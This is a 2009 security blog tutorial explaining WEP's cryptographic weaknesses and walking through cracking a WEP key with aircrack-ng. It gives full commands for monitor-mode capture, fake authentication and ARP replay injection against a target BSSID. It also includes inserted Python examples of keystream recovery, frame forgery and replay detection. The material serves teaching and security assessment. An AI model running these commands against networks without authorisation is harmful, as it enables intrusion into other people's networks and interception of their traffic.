
Video: Cracking WiFi WEP with aircrack-ng

by Jago Maniscalchi  //  June 19, 2009  //  Penetration Testing  //  No comments

Introduction to WEP Cracking

This article introduces Wired Equivalent Privacy (WEP) for 802.11 wireless LAN networks, gives a brief overview of the cryptanalysis techniques against it and then demonstrates the use of the aircrack-ng tool.

The examples in this article are all based around 64-bit WEP, though identical issues exist with 128-bit WEP.

Wired Equivalent Privacy

All stations utilising WEP share a common root key. In 64-bit WEP this root key is 40 bits long. When a packet requires encryption, a 24-bit Initialisation Vector (IV) is chosen (from a pool of 16,777,216 possible values). The concatenation of the chosen 24-bit IV and the 40-bit root key forms the packet key.

WEP utilises the RC4 cipher algorithm with the packet key. The clear-text packet is concatenated with a CRC32 integrity check and then XORed with the pseudo-random stream (PRGA) generated by RC4. The resultant ciphertext packet is prepended with the IV (in the clear) and transmitted.

Weakness 1 : Initialization Vector Collisions

Though the use of IVs might seem to ensure that most packets are encrypted with a different packet key, there are only 16,777,216 IVs available and collisions are statistically likely. Knowing the plaintext of an encrypted packet (a Windows DHCP request, a challenge-response or an ARP request) allows extraction of the PRGA for the IV that was used. This PRGA can then be used to decrypt all other packets that use the same IV. Though useful, an attacker would need to maintain a table of 16,777,216 PRGAs in order to defeat the encryption.

Weakness 2 : No Replay Protection

Through the capture of a plaintext-ciphertext pair, and the subsequent extraction of the PRGA, an attacker can craft new packets to inject into the network. A new plaintext is created, the checksum is calculated and the packet is XORd with a PRGA for a known IV which is then prepended. The crafted packet can then be sent out over the air interface and will be accepted by the other stations as genuine.

Note that any response from other stations to an injected packet will likely use an IV whose PRGA is not known to the attacker. Thus, though WEP replay can stimulate activity on the network, it can’t be used for any interactive purpose.
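The encapsulation and both weaknesses above can be reproduced offline. The following is an added example, not code from the original article or from aircrack-ng; the root key, IV and payloads are constructed values and the function names are illustrative.

```python
import struct
import zlib

def rc4(key: bytes, n: int) -> bytes:
    """Return n bytes of RC4 keystream (what the article calls the PRGA)."""
    s, j = list(range(256)), 0
    for i in range(256):                       # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):                         # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def icv(data: bytes) -> bytes:                 # unkeyed CRC32 check value
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)

def wep_encrypt(root_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4(iv + root_key, len(body)))  # IV travels in clear

def wep_decrypt(root_key: bytes, frame: bytes) -> bytes:
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4(iv + root_key, len(ct)))
    if icv(body[:-4]) != body[-4:]:
        raise ValueError("ICV mismatch")
    return body[:-4]

def keystream_from_known_plaintext(frame: bytes, known: bytes) -> bytes:
    # Weakness 1: ciphertext XOR (known plaintext || ICV) = keystream for that IV
    return xor(frame[3:], known + icv(known))

def demo():
    root, iv = bytes.fromhex("0102030405"), b"\x00\x00\x2a"  # constructed values
    known = b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + b"A" * 28  # constructed payload
    other = b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"secret payload here"
    ks = keystream_from_known_plaintext(wep_encrypt(root, iv, known), known)
    recovered = xor(wep_encrypt(root, iv, other)[3:], ks)[:len(other)]
    # Weakness 2: nothing in the ICV depends on the key, so a frame built from
    # the recovered keystream alone passes the receiver's integrity check.
    new = b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + b"B" * 28
    forged = iv + xor(new + icv(new), ks)
    return recovered == other, wep_decrypt(root, forged) == new
```

Both results returned by demo() are True: the second frame is read and the new frame is accepted without the root key ever being used by the party holding only the keystream.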

Obtaining Key Stream

Because ARP requests and replies occur frequently and the first 16 bytes of plaintext are easily guessable, PRGA key stream can be readily extracted from them. A large amount of key stream can be extracted by stimulating ARP replies through the injection of replayed ARP requests. From the PTW paper:


To speed up key stream recovery, it is possible to re-inject a captured ARP request into the network, which will trigger another reply. The destination answers the request with a new response packet that we can add to our list of key streams. If the initiator and the destination of the original request have been both wireless stations, every re-injected packet will generate three new packets, because the transmission will be relayed by the access point. Because ARP replies expire quickly, it usually takes only a few seconds or minutes until an attacker can capture an ARP request and start re-injecting it.

WEP Cryptanalysis Techniques

There have been a number of WEP cryptanalysis techniques published in the last decade. They utilise the IV collision and no replay protection weaknesses in WEP and are all available in the aircrack-ng suite.

Using the aircrack-ng suite

To crack a WEP key using the aircrack-ng suite the attacker must know the BSSID (MAC address) of the base station and the MAC address of the interface used for the attack. The attack will not work if the base station is locked down by MAC address (though this can be overcome by changing the MAC on the attacking interface to that of an existing client station).

The video below shows the use of the Kismet tool to target a victim network, highlighting its channel and BSSID. A madwifi interface is then created in ‘monitor’ mode to handle collection of traffic.

wlanconfig ath1 create wlandev wifi0 wlanmode monitor

airodump-ng is used to capture raw 802.11 frames. Below it is locked to the target channel (6) and is instructed to capture WEP IVs.

airodump-ng --channel 6 --ivs -w victim ath1

Next, ifconfig is used to discover the MAC address of the new ath1 interface. It, along with the harvested BSSID of the target network, is supplied to aireplay-ng. First it is used to conduct a fake authentication on the network (-1 0) and then it is used to inject ARP requests (-3).

ifconfig ath1
aireplay-ng -1 0 -a 00:15:E9:CB:6E:76 -h 06:15:AF:B4:20:26 ath1
aireplay-ng -3 -b 00:15:E9:CB:6E:76 -h 06:15:AF:B4:20:26 ath1

In ARP injection mode, aireplay-ng will pause until it sees an ARP request on the network. It will then save it to disk (for possible later use) and will begin replaying it onto the air interface. When a suitable number of IVs have been seen, aircrack-ng can be used to crack out the WEP key.

aircrack-ng victim-01.ivs

aircrack-ng will try to crack the key using the number of IVs currently captured. If it fails it will reload IVs from the capture file and will try again. It can therefore be started in parallel with airodump-ng and aireplay-ng.
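From the monitoring side, the ARP replay described above shows up as one transmitter sending a sustained burst of identically sized broadcast frames. The following is an added example, not part of the original article or of any tool it mentions; the record layout, MAC addresses, frame length of 68 bytes, window and threshold are all assumptions chosen for illustration.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

def find_replay_suspects(frames, window=1.0, threshold=50):
    """frames: time-ordered (timestamp_s, transmitter, destination, length).
    Returns {(transmitter, length): peak frames per window} for transmitters
    sending same-sized broadcast frames at or above the threshold rate."""
    recent = defaultdict(deque)
    peaks = {}
    for ts, src, dst, length in frames:
        if dst != BROADCAST:
            continue
        q = recent[(src, length)]
        q.append(ts)
        while ts - q[0] > window:       # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold:
            peaks[(src, length)] = max(peaks.get((src, length), 0), len(q))
    return peaks

def sample_frames():
    """Constructed capture metadata: one ordinary client and one replay source."""
    frames = []
    for i in range(5):                  # client: one broadcast every 2 s
        frames.append((i * 2.0, "02:00:00:00:00:01", BROADCAST, 68))
    for i in range(300):                # client: busy unicast traffic, ignored
        frames.append((i / 100, "02:00:00:00:00:01", "02:00:00:00:00:fe", 1500))
    for i in range(200):                # replay source: 500 identical frames/s
        frames.append((3.0 + i / 500, "02:00:00:00:00:aa", BROADCAST, 68))
    return sorted(frames)
```

Only the replay source is reported for the constructed sample; the threshold needs tuning against the normal broadcast rate of the network being monitored.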

The video below is a demonstration of the aircrack-ng suite as provided with the BackTrack 3 Linux distribution.

Demonstration

More Information

More information on the aircrack-ng suite can be found at www.aircrack-ng.org.

BackTrack can be downloaded from www.remote-exploit.org.

About the Author

Jago Maniscalchi is a Cyber security consultant, though he tries to avoid the word "Cyber" at all costs. He has spent 15 years working with Information Systems and has experience in website hosting, software engineering, infrastructure management, data analysis and security assessment. Jago lives in London with his family, enough pets to start a small zoological society, and a Samsung NaviBot Robotic Vacuum Cleaner. Despite an aptitude for learning computer languages, his repeated attempts to learn Italian have resulted in spectacular failure.